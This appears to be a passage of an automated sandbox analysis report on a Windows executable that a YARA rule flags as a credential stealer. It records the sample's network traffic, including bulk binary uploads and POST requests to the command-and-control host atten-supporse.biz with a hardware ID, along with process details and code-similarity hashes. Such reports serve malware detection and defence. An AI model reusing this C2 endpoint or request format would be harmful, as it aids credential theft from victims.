                                                                        Data Ascii: a%+$#`G! a4dj6eY:m);-& ai~Kz}$4:>ZY3LXvBb8QzjK(oD_=(td/k^:^SPorA7IZOmSUvMC",T}q742uo<y|#;rKk&;[6kyYImJ
                                                                        2024-11-30 21:30:43 UTC15331OUTData Raw: 14 30 1c a7 ea 16 75 e9 44 cd 6a 39 02 a2 85 b9 be d2 14 d0 1c dc 60 23 1a 83 20 c1 3d 2c 55 30 6e ce fc a4 11 a6 ca 42 5d 04 01 cc f8 8c 16 83 c3 ed c7 75 1e f8 ec fb 42 24 bc 6c e9 a9 36 28 0a 7f 91 25 88 19 78 64 9e 9f 1b 92 5f 47 af 0c 9e 79 d6 dc d9 34 8c cb af 3e 03 3f 85 53 6c df 38 39 ab c4 62 15 b0 71 ec 44 50 4b 51 9c 2b 08 a5 96 eb 7c b7 0b 0b ea 3c 39 30 ff 61 50 5f 7c cf f5 d3 72 ed 97 cd ce e2 6f 69 f2 d7 46 ba 20 39 2b 16 28 ec ad 93 02 19 a1 a7 e2 6c ab 5c f3 fc 9f 31 02 41 d4 50 fa 9b 65 fa 18 b5 05 82 65 ad 2c 21 ec fc 78 00 6f 0b f7 df 55 0c 35 e0 ef e1 93 ff 5b ce b9 44 ae 13 81 db ff 86 e0 b3 7d a1 da 6c 89 3d ab fe 1f c0 67 ed dc 3d c9 4f 39 0d 44 9e 6c a8 3d 66 5e 5b b5 fe dd 48 38 27 c9 09 5a 17 e9 6e bc 40 61 d6 1d 09 7e 0c 13 a3
                                                                        Data Ascii: 0uDj9`# =,U0nB]uB$l6(%xd_Gy4>?Sl89bqDPKQ+|<90aP_|roiF 9+(l\1APee,!xoU5[D}l=g=O9Dl=f^[H8'Zn@a~
                                                                        2024-11-30 21:30:43 UTC15331OUTData Raw: 0b 58 c5 89 7b 57 43 71 e1 fa 28 96 5e 9d 26 0c a8 b2 b9 20 63 01 0e 06 67 d9 3d 26 07 a2 01 07 e2 e7 a3 b8 24 48 81 a0 cb 31 7a 7b 50 77 90 bb dd 17 85 fa 7d 2f 01 d3 f4 7b 66 b4 ba 3f 5f 81 86 7e 84 ed 5e 6e 76 fd 04 53 82 03 5b e4 f5 1f ba b3 4c d9 dc c6 a7 7f 97 54 41 bf 14 99 a7 12 33 91 78 09 07 0f 8d a8 60 cc b8 94 0b 39 16 a8 6c 7f f6 c1 43 f5 c2 b5 08 b4 b9 c1 1b ed 82 70 8d 33 5e 06 88 a8 ca f4 2f 0d 7e 68 81 99 8f 5c 16 cd 36 4a 06 32 ce 32 99 94 29 df de 1b f6 c4 41 90 9b a8 98 bf 66 3d 14 ce 81 12 3d 79 54 e9 0a 2a 43 81 9e b1 60 ee 0a 9f bf 80 73 da 7e aa a2 8d 49 e4 ed e2 e5 c7 c7 00 f3 c9 da 52 f8 59 3b 12 84 5f 94 76 15 b4 f9 6a 30 b1 1d 10 38 c3 f2 98 49 41 eb 2b 62 a2 16 54 74 ab 59 2b 7f 8e 69 8a a7 08 48 8f 1f 69 cb 92 4d 3c a5 f7 78
                                                                        Data Ascii: X{WCq(^& cg=&$H1z{Pw}/{f?_~^nvS[LTA3x`9lCp3^/~h\6J22)Af==yT*C`s~IRY;_vj08IA+bTtY+iHiM<x
                                                                        2024-11-30 21:30:43 UTC15331OUTData Raw: 9d 91 a4 46 ec dd 58 ef 6b 0b d9 dc 46 32 bb 49 f9 d0 1d 8d de b5 71 f3 b6 66 69 e5 13 b8 f5 5b 87 30 a1 1b e4 02 a7 7e 88 5e ea 8d 6d 97 ca e9 4a e3 37 f8 11 47 63 8e da 0d f8 ac 58 dc 26 d9 fb 9d 4e 49 1a ea ba b1 e2 55 0e 3c b3 99 17 40 10 31 55 76 58 96 92 fa 70 23 cb 7b 97 b8 cd cb 6b 57 6a f9 ec 42 93 9e 45 91 6c fb 37 86 3e 3c b8 08 97 96 05 39 d3 d4 eb 21 aa 13 45 d3 0f 50 75 88 79 62 d8 3d 4e d2 3b 07 98 88 8a a2 d6 3b 6a aa 8f 00 fa 05 73 23 04 c6 8a 62 44 4b b1 2b c3 29 83 0b c2 c0 6f 17 66 1d 05 ee fd 01 f4 d3 06 c3 ad 5d 8f 3a 0e 01 c5 db d0 05 ab cd e7 38 e8 95 a0 33 b7 10 ea d9 6e 97 6c 14 85 67 5b 37 f5 c9 5d 5a 5a a3 87 8c a6 9b 28 97 e8 57 da ab 33 6d b3 d5 27 1f 44 5d 54 40 c1 bd 7b b2 cf 50 77 0b dc 6f ff d1 85 47 5d 40 ab b1 25 21 7a
                                                                        Data Ascii: FXkF2Iqfi[0~^mJ7GcX&NIU<@1UvXp#{kWjBEl7><9!EPuyb=N;;js#bDK+)of]:83nlg[7]ZZ(W3m'D]T@{PwoG]@%!z
                                                                        2024-11-30 21:30:43 UTC15331OUTData Raw: bb a5 a6 d6 47 37 f2 80 8a b7 d2 0a 5a 62 f4 da 8b 48 14 5d f0 90 54 9b 90 e0 7c d7 da 49 4c f7 bf b7 87 ef 4d 9b 3e db ec 56 ae 6b 3c 12 1b 6f a8 0b 1b 65 5f dc a0 36 8a 64 ba 46 0b 46 ce f7 5d 0c 7b b1 ee b0 0b f9 0d f1 92 7f 75 88 82 0a 8f a5 87 2e 3d 9f ae b5 fd dc 67 fe fa eb 23 31 d3 38 fd 6d 97 d5 c6 2f 71 27 04 c8 ab 96 ab c3 61 02 26 02 ba 8b 14 1f 4e d0 86 e9 c6 40 80 c7 2a 63 88 a5 bf 3d 47 63 94 57 81 ea 36 08 4e 9a ba ff 07 c0 c5 66 4b 91 65 9c 5b 51 0b 3f 5c f0 1c 43 b0 f8 3e e3 b8 e9 a5 e2 5b 8f 06 7b 3f 07 a0 90 b4 29 9d 79 a6 b8 23 d3 e0 e3 82 83 f4 53 cb 69 c7 63 17 40 6a 50 ce 42 75 87 0b 9a 2e a5 fe 10 18 a5 0d 1d 1e 9b 76 52 35 53 ab b5 d7 59 51 c6 83 d1 a1 0f ba 4e b4 1c 29 a9 93 90 dc ce a1 de 10 14 29 d6 39 96 33 21 eb bb 91 87 6b
                                                                        Data Ascii: G7ZbH]T|ILM>Vk<oe_6dFF]{u.=g#18m/q'a&N@*c=GcW6NfKe[Q?\C>[{?)y#Sic@jPBu.vR5SYQN))93!k
                                                                        2024-11-30 21:30:43 UTC15331OUTData Raw: 2f 01 b4 bb c2 cb ea 37 08 53 20 4b 86 3c 3c a9 83 63 32 57 e0 36 eb 23 51 66 61 df b8 6d f3 07 78 45 0d f3 17 d7 66 ee 2c ad 12 83 58 3c f6 6b f6 64 0b 51 dd aa a6 56 90 6a 53 c9 af db 54 89 81 df 11 b2 fa 1c 62 25 57 8e 31 12 ba 18 fa ae cd d8 ad 7c 57 bb 79 29 b1 ab 35 90 2a 57 e1 11 27 00 ef 7e 66 2a 32 f2 28 17 70 be ec c7 e7 be 50 f3 96 16 c0 2b 96 7d 76 1d fe 60 30 73 f6 7d 6f 1d ed 28 37 f4 75 cb 81 bb 07 41 64 11 6a 54 70 16 39 f5 e6 9b db 64 f2 eb ed 0b dd 2f 90 85 67 c1 e5 8b 10 79 df 42 01 06 ec c0 81 13 83 08 12 ad 7a 0f c8 7d 8c 05 3d 7f 23 29 ef 91 7f 6e f3 da 05 82 23 c4 b9 89 28 b0 74 33 0f d0 29 ff 22 e0 b9 8e 7c c1 b2 7b 72 91 6f 01 81 d9 b3 46 8e b2 16 e6 9d 81 48 43 18 b6 3a e8 b0 a1 ff 7b 02 b6 eb bc 9a 8c 89 91 40 3a 1e d0 db 49 b6
                                                                        Data Ascii: /7S K<<c2W6#QfamxEf,X<kdQVjSTb%W1|Wy)5*W'~f*2(pP+}v`0s}o(7uAdjTp9d/gyBz}=#)n#(t3)"|{roFHC:{@:I
                                                                        2024-11-30 21:30:43 UTC15331OUTData Raw: 86 91 8c cb 4a 44 9e 05 b9 9f 54 e5 31 db 57 b2 ad 53 be f3 83 c9 22 de 14 ea 24 c1 49 00 f0 3d 85 e4 20 35 6d c3 76 2a 87 0f 71 7f 38 47 6a 96 40 a9 d0 9f d3 cc f0 f6 ae 54 2d 81 ef e5 fc 9c 9c ab 84 60 9d f0 a1 0d 6d 78 3e 8e 29 de 8b a2 88 65 89 1d 77 6f 45 6c 65 23 45 9e eb a7 24 11 61 92 99 35 b6 79 67 41 05 1b b0 80 80 36 f8 68 3e 6b 6d f6 b0 d0 fe cf 2d e4 7d e5 91 15 4d 2a bf c7 85 19 16 24 f3 c6 a8 4e c8 49 00 11 c0 e0 17 22 4a 52 6e 41 75 f2 cc 53 a4 f2 a2 ad 98 08 b2 65 39 91 f6 d4 dc e9 8e 25 60 07 b7 3d 80 d7 43 e0 bf cb 23 1c 03 05 b2 1a a3 f9 6b 55 4a e8 6a 2f 46 bd da 28 ae 32 19 ad 26 bf d8 e9 09 58 1d 47 0f 1e cc bd 7b 3e ca a2 04 e7 75 67 e1 5f 7e 9c 39 f2 e5 59 95 86 5e ea d5 d5 62 4a 0a bd 20 6f a3 1b 61 33 b3 67 45 9b c6 27 87 b7 60
                                                                        Data Ascii: JDT1WS"$I= 5mv*q8Gj@T-`mx>)ewoEle#E$a5ygA6h>km-}M*$NI"JRnAuSe9%`=C#kUJj/F(2&XG{>ug_~9Y^bJ oa3gE'`
                                                                        2024-11-30 21:30:43 UTC15331OUTData Raw: 66 6c 6a 94 3a 65 cf 32 cc 58 38 61 02 f9 f1 82 33 33 55 91 f4 aa 5f a3 99 57 5e 80 8e a6 28 b3 e7 56 35 f6 5b bf 9e c5 b3 98 2b 75 5a ab 44 fe 4b 77 56 2b f9 d4 5b d8 67 c6 33 ec 8a 56 09 b8 eb eb 31 51 ff bb aa 6d 5e 82 a4 a3 51 31 1b ca 76 61 9c ca 91 6f 4e 45 6a 26 b2 4a 15 93 82 5d 39 85 d7 c1 79 38 76 5c 57 9a 38 85 b9 ed f9 92 4a 63 ff 71 47 9e 56 52 83 3c 08 16 e3 bc 95 88 04 1d e6 f0 99 c5 c9 68 cd 3a 8f 5c c0 24 1b 79 86 3e ac 5c 5f 57 0e 62 f1 0d 2e 20 0f b6 7f 73 fc 29 d3 c0 a1 65 36 74 36 f7 54 1a 5e 57 78 63 e2 43 c3 8f be 2b d9 97 dd e4 d7 5f 1b 84 aa 5c 5c 9d f8 fc 63 e3 77 f6 65 e9 f3 a9 8f 2b b9 bd ae 27 b2 5d a4 e5 b9 81 1f ff dc d2 2c 12 4a 37 dc fb 93 bd a4 53 d4 da 1e bc f7 e7 c6 74 71 51 5e 7b da bd eb 17 7d ec 3f ce ac 2f 16 09 39
                                                                        Data Ascii: flj:e2X8a33U_W^(V5[+uZDKwV+[g3V1Qm^Q1vaoNEj&J]9y8v\W8JcqGVR<h:\$y>\_Wb. s)e6t6T^WxcC+_\\cwe+'],J7StqQ^{}?/9
                                                                        2024-11-30 21:30:46 UTC1023INHTTP/1.1 200 OK
                                                                        Date: Sat, 30 Nov 2024 21:30:46 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=0fledhg42d8i4832mfu0458m3g; expires=Wed, 26-Mar-2025 15:17:24 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ooG8nYZ2yznuA0s0CShk1czKP3VExs7uLrDf3LdeQgQaz9429QEN1mb3IzoY3mC7i5o69eIG1ZcK8MHXv%2B7gNI8G5yJUJyzfNvv5NlFagD%2FIAaotXG%2FY0IiZjc5nGWaNVLCB7HM%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8eadf0b51cb7424a-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1846&min_rtt=1802&rtt_var=707&sent=212&recv=616&lost=0&retrans=0&sent_bytes=2845&recv_bytes=590494&delivery_rate=1620421&cwnd=252&unsent_bytes=0&cid=41f3b7a4f3a2378f&ts=3196&x=0"


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        7192.168.2.849715172.67.165.1664437644C:\Users\user\Desktop\fkydjyhjadg.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-30 21:30:47 UTC266OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 84
                                                                        Host: atten-supporse.biz
                                                                        2024-11-30 21:30:47 UTC84OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 42 56 6e 55 71 6f 2d 2d 40 64 69 73 74 65 7a 26 6a 3d 26 68 77 69 64 3d 41 44 39 33 34 45 36 36 42 34 33 34 44 37 31 39 39 38 34 39 30 32 39 43 41 36 33 32 37 45 30 32
                                                                        Data Ascii: act=get_message&ver=4.0&lid=BVnUqo--@distez&j=&hwid=AD934E66B434D7199849029CA6327E02
                                                                        2024-11-30 21:30:48 UTC1017INHTTP/1.1 200 OK
                                                                        Date: Sat, 30 Nov 2024 21:30:48 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=42p0rukq1h5vmdo9d2mgjpfudc; expires=Wed, 26-Mar-2025 15:17:27 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TtlujNqpfgTG8Ue30L6kLrb6wb0nGy0OWX4NQ5WkSVM7UOC8mSokPAs8Z13DSW1iBR%2FVpyiMfZB35%2BOkteJdOsifQLEn9KZKF9T9mD%2Fg%2B610XrviKGWXsbU12Fc0JMFIF4qpyOc%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8eadf0d1faf942eb-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1899&min_rtt=1893&rtt_var=714&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=986&delivery_rate=1542525&cwnd=211&unsent_bytes=0&cid=7cad8493ee124c09&ts=789&x=0"
                                                                        2024-11-30 21:30:48 UTC126INData Raw: 37 38 0d 0a 42 2b 58 61 37 59 32 76 51 55 70 78 4b 4f 55 45 53 46 2b 32 36 64 4b 79 62 45 35 39 54 75 70 43 68 51 51 31 68 30 45 6f 79 6b 39 63 6e 76 69 59 72 35 56 6a 49 67 56 63 6c 54 34 55 63 4f 72 47 34 34 5a 62 59 45 6c 37 78 48 61 79 4b 67 32 32 48 51 65 70 49 47 6d 4e 74 5a 37 35 67 53 51 79 46 41 72 4a 4a 69 34 72 6c 4e 50 69 6e 6b 34 72 58 33 54 61 50 39 67 3d 0d 0a
                                                                        Data Ascii: 78B+Xa7Y2vQUpxKOUESF+26dKybE59TupChQQ1h0Eoyk9cnviYr5VjIgVclT4UcOrG44ZbYEl7xHayKg22HQepIGmNtZ75gSQyFArJJi4rlNPink4rX3TaP9g=
                                                                        2024-11-30 21:30:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Click to jump to process

                                                                        Click to jump to process

                                                                        Click to dive into process behavior distribution

                                                                        Target ID:0
                                                                        Start time:16:30:22
                                                                        Start date:30/11/2024
                                                                        Path:C:\Users\user\Desktop\fkydjyhjadg.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\fkydjyhjadg.exe"
                                                                        Imagebase:0xd0000
                                                                        File size:1'278'464 bytes
                                                                        MD5 hash:B2C8BF8A5797D9EE73C205E27CFDBBFB
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:Borland Delphi
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1533725414.0000000000A0C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1533589434.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        Reset < >
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000003.1566111992.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, Offset: 009A4000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_3_9a4000_fkydjyhjadg.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 821236f1aa6714dad84eda1efac9c02b9118f137cc3898238b38b8725667cd07
                                                                          • Instruction ID: c86ab61e63cbec550cc5d277cab8a72791a23b8380ddcea7595cef8f98f88102
                                                                          • Opcode Fuzzy Hash: 821236f1aa6714dad84eda1efac9c02b9118f137cc3898238b38b8725667cd07
                                                                          • Instruction Fuzzy Hash: FC51B92A50E7C68FD3138E3C94922D1BFB1EE9722038D88EEC8C18F913D2196957C342
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000003.1566111992.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, Offset: 009A4000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_3_9a4000_fkydjyhjadg.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5966184149c672a6709677e9b4f181b2119aab7e95bd3e58ccd17cc76ccc6228
                                                                          • Instruction ID: a816fbced52a48e09ed7e329e3c72d412f2e4bacffc9263180247659ce9d0f2a
                                                                          • Opcode Fuzzy Hash: 5966184149c672a6709677e9b4f181b2119aab7e95bd3e58ccd17cc76ccc6228
                                                                          • Instruction Fuzzy Hash: 212101261092D58FC317CF38D5A4A82BFA2FE8B32639E40DCC9C18F427C2A5A542C752
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000003.1566111992.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, Offset: 009A4000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_3_9a4000_fkydjyhjadg.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7c5c5b7a9b000cb590f3d6ee0dbbf7b79276c50218bbd658d84a5bdf8db04bde
                                                                          • Instruction ID: ddabb14df219aceea68c0d1984aae82a3a1ab5cd03e01a5353bffc7b9fe7e382
                                                                          • Opcode Fuzzy Hash: 7c5c5b7a9b000cb590f3d6ee0dbbf7b79276c50218bbd658d84a5bdf8db04bde
                                                                          • Instruction Fuzzy Hash: 5921F0661092D58FC316DF78E594692BFA2FF8B71635E40DCC9C18F427C2B26542C742